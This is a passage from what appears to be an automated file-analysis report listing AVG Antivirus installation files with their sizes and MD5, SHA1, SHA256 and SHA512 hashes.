                                                                                      SHA512

                                                                                      8daafbdc34ac534cd42e162ff3d7a2fe899523a72ed6298b779def4755fbdbfc5107b7b86b201e7f40e3821111455c7332dad1fe8dadc8fe8f18282104c253f3

                                                                                    • C:\Program Files\AVG\Antivirus\setup\4188676d-21bb-405d-ba53-d3efbf54516a\update.xml

                                                                                      Filesize

                                                                                      1KB

                                                                                      MD5

                                                                                      c6095747bb4cc8514229747a3b45c54a

                                                                                      SHA1

                                                                                      09384878ae8e9576c2d13c15cc6b3d33e33c0a9e

                                                                                      SHA256

                                                                                      0d019bde3d384b6ae1b804194f4ff110a45251b747f67e464b2ffcd5fe4c2510

                                                                                      SHA512

                                                                                      219627504144c0c566e43709b8449d526e8198efeda474b91db99d019bcc9ffae6054af47f2f09cdeed58788ea96ec0e0afdbe71048c064178f5e71bf274d137

                                                                                    • C:\Program Files\AVG\Antivirus\setup\6fb0e0a7-a217-46bf-a561-e7fa022f80e8.ini

                                                                                      Filesize

                                                                                      399B

                                                                                      MD5

                                                                                      12876284cd618d55e4d5ade10e3a82c1

                                                                                      SHA1

                                                                                      207b3a7e6a8d72072a5f56a138ac8e991305441d

                                                                                      SHA256

                                                                                      249fa9d0d30a35e02c9529c323773f6e3d22a5ef30dce1e79b1aebddd6b259bf

                                                                                      SHA512

                                                                                      6c7a5fa16d331210585578646a74424b4e8671f5bd5dffe92e086604bbab88defb167f10449563d47872122cc3ed6aab998ae2917da5076836db688b2cc64735

                                                                                    • C:\Program Files\AVG\Antivirus\setup\77dbaa2f-b40e-43f5-9104-84d623a256f3.cab

                                                                                      Filesize

                                                                                      596B

                                                                                      MD5

                                                                                      dd2b6a873f841f6f55fb70ab2586dc27

                                                                                      SHA1

                                                                                      4c0f51fa386b8ce17383627974304aec72db1e68

                                                                                      SHA256

                                                                                      e6321577cc693700407b28e5a7fd067e8ef23d2b5c0c33d213134e77a7fefb1b

                                                                                      SHA512

                                                                                      25b44a462e80a4cd3f9c3777c28fd56efb7a908f46b828717a059165eb41e4a39406f55eeab33e46dc1ff385ea4e4e0b2d3d77fab7139fde7b8a859884e82244

                                                                                    • C:\Program Files\AVG\Antivirus\setup\a86e513e-05fe-43dd-a72c-a1bf58327960\27D51FFE0F6CBBEA91E630A2FE217CAC.rmt

                                                                                      Filesize

                                                                                      570KB

                                                                                      MD5

                                                                                      8f1cca99cd785e131270e3bd29d071f4

                                                                                      SHA1

                                                                                      09d322cdd22f60089a025fd7bc25be227de44460

                                                                                      SHA256

                                                                                      f2da2e1d65defa9000cfb092407e1396cfb5fde8d3395ea1c981e3508a541acf

                                                                                      SHA512

                                                                                      ae37e5e6bdfe6db1fd8c2603ce63cdb9d9dc883ec91d15f70f8859ab8212d4b0ca1ee65aa17adf19f555d2ad5ff57607ebb6f513de9c4b83f5390e56a090f123

                                                                                    • C:\Program Files\AVG\Antivirus\setup\a86e513e-05fe-43dd-a72c-a1bf58327960\4635172BCEC4371B9121024F08EED099F16651FB902BF7D6C8A1ECCBF2D90FC0

                                                                                      Filesize

                                                                                      20.2MB

                                                                                      MD5

                                                                                      4047add107b9d29977da0c871f3a82dd

                                                                                      SHA1

                                                                                      e74ec4b3cc71055efae4e7781935163ed9b387ab

                                                                                      SHA256

                                                                                      4635172bcec4371b9121024f08eed099f16651fb902bf7d6c8a1eccbf2d90fc0

                                                                                      SHA512

                                                                                      c2fe21c6fbb60fcd9f50181234a0774fb148c9ccb61dae85778a3a9dc2471c5d01eca6ad7f9e1d4bd9cdba95e76dce6e64875381edc3b30821405fc5a5893b9b

                                                                                    • C:\Program Files\AVG\Antivirus\setup\a86e513e-05fe-43dd-a72c-a1bf58327960\update.xml

                                                                                      Filesize

                                                                                      887B

                                                                                      MD5

                                                                                      4c593e16dcbadec9bb1b949d0e89a657

                                                                                      SHA1

                                                                                      9b21c60a04d896fb9b93d041d13024acad015977

                                                                                      SHA256

                                                                                      0ac4ff9652881219831cf32f9921dba9c1a61dc88df48c1c7a63bda055571e39

                                                                                      SHA512

                                                                                      8fffbe3aed66b2cf65c1ec7400db7f41f1e080b5267d49114abbac48c40adbb4dae18c4be48ddd1aa342055dcc3f7dfa7ee2f55d70cbc9d1aa9b963cdeee8643

                                                                                    • C:\Program Files\AVG\Antivirus\setup\config.def

                                                                                      Filesize

                                                                                      18KB

                                                                                      MD5

                                                                                      076b2b6ca0ee724bd28a39e5d4646df9

                                                                                      SHA1

                                                                                      742a1b37f09a5d2f030e62589eb17574d055ee16

                                                                                      SHA256

                                                                                      48d1f4cbcc7797deee084f3256f7f52055dd9b28453cdb72fbbfb79f1b0ab25a

                                                                                      SHA512

                                                                                      b33cff1732c69fdccc7d043e8bf9a0f8bf6cd8bbab1e43ec0a174731a64bdfb181279e34643f4b2d8b191cda7dda30c47c18f973ba2c0622611485b054dbb269

                                                                                    • C:\Program Files\AVG\Antivirus\setup\config.def

                                                                                      Filesize

                                                                                      19KB

                                                                                      MD5

                                                                                      03977341d22a8364a7ae22372f3c8dac

                                                                                      SHA1

                                                                                      208d8fbbf2aff6587fcefe72dd466507ad1697a4

                                                                                      SHA256

                                                                                      98e45a8274193b0d6eb8518758f8d47f17f30cabdb873eddab64d8c8cc975a32

                                                                                      SHA512

                                                                                      9001704b8dcd0db4668c90fa6e65619d96ae8a73d29e24d70acf588a5ce8412b62806c87ffb0eea8f48cb2c67d9eca3a51102094015f4226aa7f62f49a43e2d7

                                                                                    • C:\Program Files\AVG\Antivirus\setup\daff24b8-5a4a-4a78-8602-811b5c7dd6ad.xml

                                                                                      Filesize

                                                                                      50KB

                                                                                      MD5

                                                                                      57a854ad26f66d753fd341ec490239d7

                                                                                      SHA1

                                                                                      fcaa13ba383a1dda5835e31658429d1adc3fa8ec

                                                                                      SHA256

                                                                                      6beb8db4726d18c33cdc10ce9832c791a21596dec09b1297fa75c402e8f9a887

                                                                                      SHA512

                                                                                      aa6a69d5ce946ca399fdc6ca7c6fd37bdac35d8bfbe288c2d2f709913b45ea1d6bdc9bbf33d2e5292583c7b585c449d7cb6d91a8fdf4d8f91f489136acdd20d4

                                                                                    • C:\Program Files\AVG\Antivirus\setup\setup.ini

                                                                                      Filesize

                                                                                      17KB

                                                                                      MD5

                                                                                      8ceb4d6d34cb78e360370dc4d103739e

                                                                                      SHA1

                                                                                      39839f3683eb2d66faab68755a992e9ff314becf

                                                                                      SHA256

                                                                                      23dcf7db12856ea77cc1ab908356dfddfca44b7bb19eb1a69615a55596070cd1

                                                                                      SHA512

                                                                                      a365a4250d8f9e529d88005f5338cb15ed35d02bddaf630e46fd30894e4e9891da3a2c2e51583b63c1e2cf57a44204d214456b031dc82b279e8ba429203bb673

                                                                                    • C:\Program Files\AVG\Antivirus\shepherdsync.dll

                                                                                      Filesize

                                                                                      2.1MB

                                                                                      MD5

                                                                                      21c85e4a47ae64ad53e517e130906c85

                                                                                      SHA1

                                                                                      267bc59573b2294b88733f5c31aa72aa17cbeabf

                                                                                      SHA256

                                                                                      1c7861781d62d931e6aee9d91d413dc6c2dbcbff41edb1da699e5c3829f72d5d

                                                                                      SHA512

                                                                                      f9fca6490b4a54388846bcb8087e32c3599a28d1594cb9dcf02dd73933b59775c91adca1bba93444790ba775932115bd2db80ac598e41062943c2b687fbf0941

                                                                                    • C:\Program Files\AVG\Antivirus\shred.exe

                                                                                      Filesize

                                                                                      464KB

                                                                                      MD5

                                                                                      09eb4ad8a650f2270a8768a36eab0abe

                                                                                      SHA1

                                                                                      a6f16cae39672b6154cd778cbe263e1ea00b406c

                                                                                      SHA256

                                                                                      63e1733aed963854f8d0d67af6b3df0bb744f1911d7bf9f3fd258fe7b80b3ed9

                                                                                      SHA512

                                                                                      ee65b8e2677a9a7a6783b595ff7d0a8a31cdc7da11e92a37b3564fac86702d0e501fe2ffe245311c3ff8d27c6119e94fa7ac965664803d7870fb104e83caad0e

                                                                                    • C:\Program Files\AVG\Antivirus\snapshot_blob.bin

                                                                                      Filesize

                                                                                      47KB

                                                                                      MD5

                                                                                      4bfac8501c72cdd860ea754d1d580cc8

                                                                                      SHA1

                                                                                      1afb2418f3f31e924519eab2b172ceb41dbe15c2

                                                                                      SHA256

                                                                                      67062dee20934c4d297aaf1dd96d97a7bee8bca5c9e3cf3c6a18cae60e6ab191

                                                                                      SHA512

                                                                                      d622736ee5ebe22dd48ccd81916a400f4ed519bdddab1fa9b466e5b7012cb15601a63cb0ba5bd897ccf33aaba917e7338a0cb4339000e5f002d266396fd22511

                                                                                    • C:\Program Files\AVG\Antivirus\snxhk.dll

                                                                                      Filesize

                                                                                      408KB

                                                                                      MD5

                                                                                      ccd3291babc96d7b4a2739e9f2d60e59

                                                                                      SHA1

                                                                                      7d95acf4a9fb74e38c70116c2d0ba4c2a622c5a1

                                                                                      SHA256

                                                                                      d8106076faabfca104214ed9ddbcf0304382d7fb6253cc68da29e2ca0f8bb115

                                                                                      SHA512

                                                                                      304200576bcafda812d9cbb65c8b7dcd319063d029b211fde1c6846a55ba002957d4b43fe3a1f2d01131ced1d1ddafc8a731316ce4b33c883ae9290f30ed1368

                                                                                    • C:\Program Files\AVG\Antivirus\snxhk.dll

                                                                                      Filesize

                                                                                      408KB

                                                                                      MD5

                                                                                      23d5125fd07d794e4181ca0d4b9ab2c3

                                                                                      SHA1

                                                                                      3fc8c5ba369a402571909abb80dfebd81019f6f2

                                                                                      SHA256

                                                                                      2722ff476da86ff14922a68dd34336cb1d7e91aaddc1a6683f63d0f4f008725d

                                                                                      SHA512

                                                                                      866e2ad8f9bb016125e25a2bdf663f208ad250c959f1fea3a88054b6421c625532fe7788b3b3178a5171e8e2156ba1b156365bdbaf5728b56aa64191e7ae5d43

                                                                                    • C:\Program Files\AVG\Antivirus\streamback.dll

                                                                                      Filesize

                                                                                      943KB

                                                                                      MD5

                                                                                      0013f58f50210f28aeeb500b37970b8f

                                                                                      SHA1

                                                                                      726a5dd923724aba776ce4d584b5c606871578d8

                                                                                      SHA256

                                                                                      b05c84d6bf2bdbd31cd0bfac8ace0920d17ddd6a82de5a2ee779b0e1bc1a0189

                                                                                      SHA512

                                                                                      9e4b8029c93066aff7c566a54bb8ed00203ebe66ead6bd50ab646f00240996f74a5520078af9caf9a8ad791136a1402ced45f7ed4aea6d81307c8b58128c874d

                                                                                    • C:\Program Files\AVG\Antivirus\su_adapter.dll

                                                                                      Filesize

                                                                                      1.5MB

                                                                                      MD5

                                                                                      fde49a2895aab80f1536e1430a2e948c

                                                                                      SHA1

                                                                                      6037c3a01554e5c0c9f4a9da505fcef37f80ce3e

                                                                                      SHA256

                                                                                      429655328f86d9ab46085a40113616165462e500cc18ac47ae2c21d6f8dde2b9

                                                                                      SHA512

                                                                                      39edbe6abbed671ef9a97e4bdfc6aad8d211a5fda12626735540ce1b37d96b767cd5f44d67466adcbf48bbc0f4ea38003932033464f24b2bdf3e670ffc1a6570

                                                                                    • C:\Program Files\AVG\Antivirus\su_common.dll

                                                                                      Filesize

                                                                                      246KB

                                                                                      MD5

                                                                                      340540e70aadca235d4d6c586ca16fb6

                                                                                      SHA1

                                                                                      77f343f7e0dd5c98be248a482ca8818f83035abc

                                                                                      SHA256

                                                                                      bbad972f08400f2b66bcca3cc15c480159f67f2bb45ce900328d299974c35bbc

                                                                                      SHA512

                                                                                      3555c2a8ed57d75667495596dc5167d6d49437afbc696c22df7a062c542333cec0fdbf6163dfc68352f63945792c68b21d088400b69eb0519520886b66fe3363

                                                                                    • C:\Program Files\AVG\Antivirus\su_controller.dll

                                                                                      Filesize

                                                                                      1.5MB

                                                                                      MD5

                                                                                      9c422ef0f1fedc33c90b401a26c3ded0

                                                                                      SHA1

                                                                                      b1ac7c73df2121868d6afd0fbdd27dae4db0f8d4

                                                                                      SHA256

                                                                                      dcd506aabc8419cc1b9fda0a4bc6586923e36420390d27d20cb612126eec89c1

                                                                                      SHA512

                                                                                      ec7762a5a9972af400f06a582e3541920aaeface6096864150bac7f78c4165cbd6cc98e63add32b3074d38d799c861159d2de8395aa5b12746c359a0cef4dc62

                                                                                    • C:\Program Files\AVG\Antivirus\su_worker.exe.ipending.33edda96

                                                                                      Filesize

                                                                                      3.7MB

                                                                                      MD5

                                                                                      f8d4cab5497efe4f63c822e5b49f7012

                                                                                      SHA1

                                                                                      0c90ad055f3e73f215a2cf13f8d99c11af9cf938

                                                                                      SHA256

                                                                                      75fbf89dbe401e4ed5b834c112bca94fa0ac6dd531ed161ae8cce0f24caeac3b

                                                                                      SHA512

                                                                                      004ad1cc534f4550aa4ee8f7105d808173e61c9b530c170ac61f099dbef071fd9a9b9ed44f8b602d3ef3ce7bbaa5bf457f89b8bf76efc9739067560ea7b9cc88

                                                                                    • C:\Program Files\AVG\Antivirus\swiftshader\libEGL.dll

                                                                                      Filesize

                                                                                      421KB

                                                                                      MD5

                                                                                      227af943a451da44e1920791a84a7975

                                                                                      SHA1

                                                                                      e7ca54eb3eb82e47cc692a2874802ae246d9eb62

                                                                                      SHA256

                                                                                      c86ee36ea5f2052c968bfea4c69b60f533639cf3601e7d4015d5c3b5e06f57cd

                                                                                      SHA512

                                                                                      9f1868aee4164611e05b35c62a6a58c0636f1270f32da0f73cc64fcbf6731580b631d236998881293260a18d5355dd2dbb2ec9812c5410ba2ba84e24d6237e27

                                                                                    • C:\Program Files\AVG\Antivirus\swiftshader\libGLESv2.dll

                                                                                      Filesize

                                                                                      2.6MB

                                                                                      MD5

                                                                                      a7e8c182da0331fe22b69da756bb8387

                                                                                      SHA1

                                                                                      e018f3693b6bbd281cf894f37039bb8ae8e09b0d

                                                                                      SHA256

                                                                                      26b30de37e4a069b39863290fe2bb59b61aa6e54662b7f9557173ccdd4ff0dab

                                                                                      SHA512

                                                                                      b92de4b3c547256e20b758aaa93c320f9f404800d009a56697cf2f08d634918d46525e7df2ff85f69d663a1e7fbf1b4532d1d48f65880b2e58cae03eb0c7de01

                                                                                    • C:\Program Files\AVG\Antivirus\task_performance_logger.dll

                                                                                      Filesize

                                                                                      441KB

                                                                                      MD5

                                                                                      e2dd4b22300fda0fa12a65566fe40bc6

                                                                                      SHA1

                                                                                      cd52db81c653f8bee9df071c8cb63ed5032d4daa

                                                                                      SHA256

                                                                                      cfbf54bb91a6500e855eb42d7f5e8eb53e490fca3c8249dbc6fb1a7f191e1680

                                                                                      SHA512

                                                                                      f2fcaf6ad6c5d310533302a622f56589fc7e5cf5a20526a54aef58d48551973aa0c869ea191d143b555836cff528b37027405f49ef495dfdd8d710894e742666

                                                                                    • C:\Program Files\AVG\Antivirus\tasks_core.dll

                                                                                      Filesize

                                                                                      567KB

                                                                                      MD5

                                                                                      0f3563c71009408b8ecc25153c88f3f4

                                                                                      SHA1

                                                                                      0c19537ce37a8d0344387445e1aaa577b1075a88

                                                                                      SHA256

                                                                                      a788c00cdb98a9bcb0ac0f6ac078d6e630ff369fe7c6c6caf36396e63fc7f5c8

                                                                                      SHA512

                                                                                      21814fce96897df85f60a70f9cc74208de1f6234a5f6779b7330303cd4b249a22c609920d69449370a86a266f72eb7b5c78c7272dcd814531d43825f1e53ae73

                                                                                    • C:\Program Files\AVG\Antivirus\v8_context_snapshot.bin

                                                                                      Filesize

                                                                                      161KB

                                                                                      MD5

                                                                                      652a0ec5b9d98955bffbcba3ee8eb3a4

                                                                                      SHA1

                                                                                      2d7c8d85b0059df2b429e40f03da604c72761c22

                                                                                      SHA256

                                                                                      13f67a42aaafb7c1f6dadf60387b2769c8344299607b074870dbd6837ef7b2ed

                                                                                      SHA512

                                                                                      1a8968de3874006c0dd56e417ee381191bd275eedfbb83d665ab84997824a532ab44f8e32880ab740a7e15034b8ea53da4312729adfc2c213b795be594558e8b

                                                                                    • C:\Program Files\AVG\Antivirus\vaarclient.dll

                                                                                      Filesize

                                                                                      1.4MB

                                                                                      MD5

                                                                                      c0830189ad87a3fce12660414d0236c9

                                                                                      SHA1

                                                                                      855280ce8c856dfce20bc25b994264c3d01a3d52

                                                                                      SHA256

                                                                                      ef70f5d6cd63f5b3dc9c565ba54ddd976e4d33d58b187d75557d92742741e7ea

                                                                                      SHA512

                                                                                      b44f7dd0b3db351253d59b3e2cd20bcd97fae99ed9221da154e8c9b625ada8449dc6f50c7f561ef0f3049ea1b28ed44ce2049c6ff558b73e171546b21a8118c5

                                                                                    • C:\Program Files\AVG\Antivirus\wa_3rd_party_host_32.exe

                                                                                      Filesize

                                                                                      2.1MB

                                                                                      MD5

                                                                                      7a7b074a5150620b02e6631c4cfb716b

                                                                                      SHA1

                                                                                      ce8eb9faae158e7b8cc7f25b1d26e8c662f1f38e

                                                                                      SHA256

                                                                                      ef26dd77090ee1e049238f1c35f7fa4574dcaa8dc578e831fcb01826ec2985a0

                                                                                      SHA512

                                                                                      c45758e03634a3fd5934983296bbeed7a7c84794ce059d791ec13ddd14dbbce62706a88cb97848924ebc97ac0667a46ff4bd820166df25067b489d01818fdad6

                                                                                    • C:\Program Files\AVG\Antivirus\wa_3rd_party_host_64.exe

                                                                                      Filesize

                                                                                      2.7MB

                                                                                      MD5

                                                                                      3d4531ee3609855f13bbab57e6c188a8

                                                                                      SHA1

                                                                                      4aae185755bef08482d0ec8650266e7169e53456

                                                                                      SHA256

                                                                                      dc9ceba014a20b6adbaaa79198f56bfba335d59198db708a22f9b67ce2026c8c

                                                                                      SHA512

                                                                                      9f7aeafe8f04527b1e68277140804fbcaf97ba9f00a2bd4592f12604fd8205162915e7d1b5949814ad62062dd3e96a14cb49cffe99410b919378b0d10903c5ad

                                                                                    • C:\Program Files\AVG\Antivirus\wsc.dll

                                                                                      Filesize

                                                                                      4.1MB

                                                                                      MD5

                                                                                      3ec87ab3cfe8b0e9239c12ad08c4596c

                                                                                      SHA1

                                                                                      50c565823c08cf01a5bc2dbd6c27642f89f6a720

                                                                                      SHA256

                                                                                      be4a3bed9086f90775fa7fb66a9e3a59ed8ea0a013d834026ebb3989fe617936

                                                                                      SHA512

                                                                                      d5b2755752038d3df14b8579da00ad729c8a77a299c3abb612641a6c5c4712ddadb4cbb3f9b7501b43cb083e0899fd597245d686dd7ee0687780aa0aa2a1e455

                                                                                    • C:\Program Files\AVG\Antivirus\wsc_proxy.exe

                                                                                      Filesize

                                                                                      106KB

                                                                                      MD5

                                                                                      75ca8458d560e6f26a7ee0475e650458

                                                                                      SHA1

                                                                                      208c3669b1cf9fcbd514d71d95e4a905cc908989

                                                                                      SHA256

                                                                                      cf9c722de59b6a7ebba99620e45693f6f9affa8be26a361fb5d6662e539dac3a

                                                                                      SHA512

                                                                                      4af84fb6ff1bc9d1469b6afd9f7c0de7a8401fadf72551939e3f0ef150b30e3187d686c900c9a0afcbe35049ef37aa0d278ba895bbaa5d7e27fea4b08aaf2cc1

                                                                                    • C:\Program Files\AVG\Antivirus\wsc_proxy.exe.manifest

                                                                                      Filesize

                                                                                      958B

                                                                                      MD5

                                                                                      7cefa19bb1eaa218e139641afe5f7ebb

                                                                                      SHA1

                                                                                      a7e9779e8638eb304f6ed251c598bd49d050bc2c

                                                                                      SHA256

                                                                                      1e7fef380e3b0a873ec4f19e089af82d40e1999163f4018c316e93efd725a8cd

                                                                                      SHA512

                                                                                      0336c0984f01fc432442a12a5d3084dfb05c9b1e44a253d1073288cfd5ce0da4a0841ca6989047697107d553d7a04f354a6898f1d00f2f7efd6469dd50a49f1c

                                                                                    • C:\Program Files\AVG\Antivirus\x86\AavmRpch.dll

                                                                                      Filesize

                                                                                      711KB

                                                                                      MD5

                                                                                      881deaf4f77f3bdf2b719f78cbf870e4

                                                                                      SHA1

                                                                                      59ab8d02cc440e19f90699978e406d5c0a2f1fdb

                                                                                      SHA256

                                                                                      41a73670873e46f46e75efe272f0ea17ed7af4cf121ab8aa54eefcb34019beac

                                                                                      SHA512

                                                                                      9f2ca6a984a343deb6d4064db8635e88e29f5318344aa6f5b6f40b81e77b282101a28e5423909d1461bfcd69a04252a6d0360cbe36d34ee3884cf212a4638a8f

                                                                                    • C:\Program Files\AVG\Antivirus\x86\AvDump.exe

                                                                                      Filesize

                                                                                      3.2MB

                                                                                      MD5

                                                                                      c40aad590491e6758e5db435169332ef

                                                                                      SHA1

                                                                                      09b13acf45ae9aada0b9702f7c776f1d9f7f8a01

                                                                                      SHA256

                                                                                      0f67de51f2892f9f5924f8eaf407c1bae10bdbaefe09ababf662704ac966c397

                                                                                      SHA512

                                                                                      99a8e4ca1b66ea526e68a7a5ab9583e477077e3e9552ba112cf839ffc365f98fd14a631359470c637cc8fec9a34f9cc2312d4a0f412144da5409f4178b5d27a0

                                                                                    • C:\Program Files\AVG\Antivirus\x86\RegSvr.exe

                                                                                      Filesize

                                                                                      3.5MB

                                                                                      MD5

                                                                                      1cf8a393c02868a0d1ae95fb048023ee

                                                                                      SHA1

                                                                                      e4daf84c6f4420961258fe8c21db8a771b6f172f

                                                                                      SHA256

                                                                                      f562a54f565004d8a18b45aeb68fb7dc572a22f6f72de16060b3e7ca5f0078fd

                                                                                      SHA512

                                                                                      aac3f45a3acade53fa441a15c8292905224647d59b4e0ad1481cf5b3aa727046da8f642a56475421fbb50d01891053cfd46ac881753bfe667ff7a8d969eb17b6

                                                                                    • C:\Program Files\AVG\Antivirus\x86\asOutExt.dll

                                                                                      Filesize

                                                                                      3.3MB

                                                                                      MD5

                                                                                      2b284360a2480be2ae7ca4bbc9baaf29

                                                                                      SHA1

                                                                                      29bf65403d14e021214da79bb02ca2bd9e66f1b9

                                                                                      SHA256

                                                                                      46fe0e560da5cb4bac1193c061edcf929306a786f53bdb411c913b84d9254720

                                                                                      SHA512

                                                                                      5767cc360943599efb008d57486974bd14c2bf44c7b1a355197374e4219926883765863803acbf490584a556a26fba7c5bca20cce16023011667d3041be8284d

                                                                                    • C:\Program Files\AVG\Antivirus\x86\ashShell.dll

                                                                                      Filesize

                                                                                      3.4MB

                                                                                      MD5

                                                                                      875052955d6c65acc1a311a889772a0c

                                                                                      SHA1

                                                                                      de53cbacdc3e0c8fc1fd33910cdc70b025e45e6a

                                                                                      SHA256

                                                                                      6ceb44d9436a2404c136a826e8e168e02fc40f7481f771500dabb2cc56dc0697

                                                                                      SHA512

                                                                                      3c8f84ab0e7fb4b1853c5afa91fecf1409a7885a8bbf0e66bb721ef436ef915d04c13ca6f3be148582b42f2ef3b33219debf1e577e7cc1cebc7550f5cf8b0476

                                                                                    • C:\Program Files\AVG\Antivirus\x86\aswAMSI.dll

                                                                                      Filesize

                                                                                      782KB

                                                                                      MD5

                                                                                      5bd9c79a2a3f0f3ce1199de63270d8aa

                                                                                      SHA1

                                                                                      3f9063604564de80c2e88c82afbbf58020e79aa7

                                                                                      SHA256

                                                                                      5a2e5a3103447b62317b85e27a26c29d156a79ba2ab9de26801840c51e9cd160

                                                                                      SHA512

                                                                                      407c2f826cda4a5ae86d0002d748eb58571d12b6290c8f511a747d24ecff3d5c06710bb36c1df6c0808513af4ac5882a40d77e705f131138e0023ff1c43f57cb

                                                                                    • C:\Program Files\AVG\Antivirus\x86\aswBrowser.dll

                                                                                      Filesize

                                                                                      509KB

                                                                                      MD5

                                                                                      6e0b95de1e138ec5cb47918d200f4c5c

                                                                                      SHA1

                                                                                      1d3f7c84307b17163ec8a79ca667ffb6a3de8623

                                                                                      SHA256

                                                                                      b234ce00fa1a598939d038e40df5c1b0f85cbebd51a4eeff897f9f28d9bab30d

                                                                                      SHA512

                                                                                      8966fb52a29ff8341a6ebc9f14ee73b7f9749abc1496a47bd79e20aa29e8b711f2d0f487f7db0bae1f5688c525688edda39b99210f203a9cd44aa64d445e9c53

                                                                                    • C:\Program Files\AVG\Antivirus\x86\aswCmnBS.dll

                                                                                      Filesize

                                                                                      381KB

                                                                                      MD5

                                                                                      be27da93295c56cc43c025b30af2043d

                                                                                      SHA1

                                                                                      08f9cf4884510d66c268aa10c1effbacf4675570

                                                                                      SHA256

                                                                                      0c7cf4ec737f4f67f56351a1996a7b6292b9d3efa36068651226caf679cacc9f

                                                                                      SHA512

                                                                                      ba902d91d72764ccbbd0b0995f1eb931444f2f52a2f09858b3774d4f200b76cdecafeee98ff7f2ec8f71e02b6f5c811ee21b84c597c6892c155a2fbc6c272ac1

                                                                                    • C:\Program Files\AVG\Antivirus\x86\aswCmnIS.dll

                                                                                      Filesize

                                                                                      379KB

                                                                                      MD5

                                                                                      5696cfa261592c3502266f2818679c12

                                                                                      SHA1

                                                                                      b5428a6849dbf113293f6ecf9962d9344121ac80

                                                                                      SHA256

                                                                                      b6e5d5cbc89bb8d5e52e9300fdf4792711ef37d954746b3d1ab053a86a758228

                                                                                      SHA512

                                                                                      bfe42e1637cdd43582c4a2acb2e833f6eac4e8855f998f988cfe4fdcaf78551a832edd5d9f5a474b050b7882475ec46aaf5790453dd130e35497104ef6d59ec1

                                                                                    • C:\Program Files\AVG\Antivirus\x86\aswCmnOS.dll

                                                                                      Filesize

                                                                                      173KB

                                                                                      MD5

                                                                                      d1a090efef97999d4506907fa52fcde7

                                                                                      SHA1

                                                                                      4952882e190ad2e4d08e420598440573bcfcd199

                                                                                      SHA256

                                                                                      335ef235b65f3072f506449bd4795027a16bd53b9688c7f292ab11a8a1c4bf96

                                                                                      SHA512

                                                                                      2e2a8baf33ea678bfeb8ee7ac609ce5dfe08e5fe658bc5e53fccee5cfcf5bfbe00571694358f0ed1a8edc1291ddecfb1e560881df8af84d8ad6f89517f7d5bc7

                                                                                    • C:\Program Files\AVG\Antivirus\x86\aswProperty.dll

                                                                                      Filesize

                                                                                      1.4MB

                                                                                      MD5

                                                                                      500d168345bcb9984b30c128e8e7538c

                                                                                      SHA1

                                                                                      c54626b111d3e9fc724dbf35a818d7021e79c8ac

                                                                                      SHA256

                                                                                      709a9f8f7f10a1dd54f5e655d2b6da3180570ecfa5c2b199514c91ce69119314

                                                                                      SHA512

                                                                                      81b5f26ddc4a71ed670f02f576fa46cadc6cfa90a1fcf00d80b48fdaa5dcbd940ceb15d786e5e07c0d3aeb983fc17e60228510e69b4d1bef5ef1f8e3d9d2929e

                                                                                    • C:\Program Files\AVG\Antivirus\x86\aswPropertyAv.dll

                                                                                      Filesize

                                                                                      1.1MB

                                                                                      MD5

                                                                                      37ad09badd5cc113039e17768d05faac

                                                                                      SHA1

                                                                                      b616e0adda4c2eba345dd767ad0e171a6fd86bb9

                                                                                      SHA256

                                                                                      256d2ee620d5bf6f35beb6bcf916ddb3c5625433ebd857e7b33efef1715906d4

                                                                                      SHA512

                                                                                      d3b9486bc74c4f90f6bb825795b1dc07e818037f67e198c3fd839c4df159f458fa091cb9c546164368c8b3dbc1d22c2a92281067c38bc4a4b23e278852fe0a3a

                                                                                    • C:\Program Files\AVG\Antivirus\x86\aswRunDll.exe

                                                                                      Filesize

                                                                                      3.6MB

                                                                                      MD5

                                                                                      9b5ce728448c5ea5b0f6861cd6776991

                                                                                      SHA1

                                                                                      6d18cfc87efb758f8eed8cce14d2d5ad8cbf451d

                                                                                      SHA256

                                                                                      740be406d42c877f3e075caf7280758bb0416d4b9ec9dea11e573f9bd3aaf91b

                                                                                      SHA512

                                                                                      1f8d002c754d6ca016ab901300d7e7a740e150721a4abd95d8db3a4745e9084c3474cd8fd510922153764030d33a8722abc19ce445ba190e9b4bdf5c310d9378

                                                                                    • C:\Program Files\AVG\Antivirus\x86\aswhook.dll

                                                                                      Filesize

                                                                                      72KB

                                                                                      MD5

                                                                                      85051b97203c85f44aa4a058ff1d0a5e

                                                                                      SHA1

                                                                                      853ac0df9642906be63aac6d61fb552a195e7a38

                                                                                      SHA256

                                                                                      9df966468d91b16c54a81f3caa49fa3a39d395655e2ee6e5a9c63bc209c70da3

                                                                                      SHA512

                                                                                      ba0d709a40954ed0d193724567b28a05ef416c13edf0e08e17de57de6346e2262971903b04b121088b4e2e24d97d092bde86a672ec8aacc4a92ea9c2ccc28bb1

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\API-MS-Win-core-xstate-l2-1-0.dll

                                                                                      Filesize

                                                                                      12KB

                                                                                      MD5

                                                                                      b685358b3d0f37b68a24a6862f2ab63c

                                                                                      SHA1

                                                                                      b98d6706b7c922a2c93a75280e599361502697d1

                                                                                      SHA256

                                                                                      7cf73e4f69b3dfd89f3b24167f2f421b17537f3a4e707c63c675457b4fbf850b

                                                                                      SHA512

                                                                                      965580bfab334a217625e64dc5ab8622dcd18e5377453252b0c40c8e171040411a8916145f98e1bbe7476ad140562ea52ba148bf584d3389a07c2654d122e9b4

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-core-console-l1-1-0.dll

                                                                                      Filesize

                                                                                      12KB

                                                                                      MD5

                                                                                      cd3ab89fadee9d9ab307f55390798102

                                                                                      SHA1

                                                                                      7f5646953d2a90c1033cfee8d2e6d394b05d0a5b

                                                                                      SHA256

                                                                                      915c296fabf88b9e3b43b5a570a6e8e642071678ac443c555f6e95bee7925bc5

                                                                                      SHA512

                                                                                      5b68fbe6456897695fdbc683dd703c286531e831fa3039ba19bc376ac5f363cd0588a815156b18139b82e64ae5c9d87bee025805658005e46d3fce915a9f332e

                                                                                    • C:\Program Files\AVG\Antivirus\x86\avg.local_vc142.crt\api-ms-win-core-console-l1-2-0.dll

                                                                                      Filesize

                                                                                      12KB

                                                                                      MD5

                                                                                      4228b8901e130b70052da8562dc7b5b9

                                                                                      SHA1

                                                                                      5007d4da77465c38d66689312418acbef9c7aace

                                                                                      SHA256

                                                                                      67f4d89f85a61b18ac1f5d6d04f625d64bedb252c219ff9785cd1508876bc718

                                                                                      SHA512

                                                                                      cb42b5a184fe08df207ac391c3e87d44dba15008efe2caaa0774439e8f7df2ec35f63e981d080fdb8fe2f46e8a43ff58a332d6cd241313ce419fa2ea0ac2f40e

